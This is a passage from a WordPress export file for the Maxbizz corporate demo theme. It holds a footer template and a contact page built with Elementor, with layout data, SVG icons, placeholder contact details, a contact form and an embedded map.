ut";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_footer_builders/footer-2/</link>
		<pubDate>Wed, 16 Dec 2020 10:27:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=ot_footer_builders&#038;p=2219</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>about us</h6>		
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Linkedin-in
											</a>
			<h6>Head office</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>our location</h6>		
										<img width="328" height="199" src="https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png 328w, https://maxbizz.s3.amazonaws.com/images/map-footer-home4-300x182.png 300w" sizes="(max-width: 328px) 100vw, 328px" />											
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					London
				</h6>
								<p>+5-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Tokyo
				</h6>
								<p>+3-800-456-478-23</p>
		<p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2219</wp:post_id>
		<wp:post_date><![CDATA[2020-12-16 10:27:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-16 10:27:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc09487","elType":"section","settings":{"structure":"20","background_background":"classic","background_color":"#061E2F","padding":{"unit":"px","top":"110","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"00e7c48","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"31de55d","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"8ae1d17","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c63d88f","elType":"widget","settings":{"title":"about us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c398331","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#AFC1CE","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f2c623e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#13364F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":true},{"id":"537302c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c746f8c","elType":"widget","settings":{"title":"Head office","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"987ba41","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"9a4d418","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d07541a","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"e8489b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d81fffc","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20"},"elements":[{"id":"0067a26","elType":"column","settings":{"_column_size":50,"_inline_size":61,"_inline_size_tablet":50},"elements":[{"id":"4a26452","elType":"widget","settings":{"title":"our location","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d51dbd3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/map-footer-home4.png","id":1966},"image_size":"full","align":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"3ec2e74","elType":"column","settings":{"_column_size":50,"_inline_size":39},"elements":[{"id":"20403b9","elType":"widget","settings":{"title_text":"London","description_text":"+5-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"a21e377","elType":"widget","settings":{"title_text":"Tokyo","description_text":"+3-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6cde5fb","elType":"section","settings":{"background_background":"classic","background_color":"#061E2F"},"elements":[{"id":"e668faa","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a9f1fa4","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"ff02816","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63c3646","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#879DAD","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:11:"text-editor";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:5;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:5;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:5;s:16:"description_text";i:5;s:8:"position";i:5;s:10:"title_size";i:5;s:13:"selected_icon";i:5;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:5;s:9:"icon_size";i:5;s:6:"rotate";i:5;s:10:"icon_space";i:5;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:5;s:27:"title_typography_typography";i:5;s:26:"title_typography_font_size";i:5;s:28:"title_typography_font_weight";i:5;s:33:"description_typography_typography";i:5;s:32:"description_typography_font_size";i:5;s:34:"description_typography_font_weight";i:5;s:11:"title_color";i:5;s:28:"title_typography_font_family";i:5;s:17:"description_color";i:5;s:34:"description_typography_font_family";i:5;s:17:"text_align_mobile";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:3;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=455</guid>
		<description></description>
		<content:encoded><![CDATA[contact details	        <h3>Our Contacts</h3>	    
		Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>	        
				<h6>Visit Us Daily</h6>				<p>411 University St, Seattle, USA</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h6><a href="tel:+1-800-456-478-23">Call Us 24/7</a></h6>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>	        
				<h6><a href="mailto: maxbizz@mail.com">Mail Us</a></h6>				<p>maxbizz@mail.com</p>			
										<img width="849" height="878" src="https://maxbizz.s3.amazonaws.com/images/image-contacts.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image-contacts.png 849w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-290x300.png 290w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-768x794.png 768w" sizes="(max-width: 849px) 100vw, 849px" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f1319-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1319" />
<input type="hidden" name="_wpcf7_version" value="5.3.1" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1319-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Ready to Get Started?</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send Message</button>
</form>		
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>455</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contacts]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
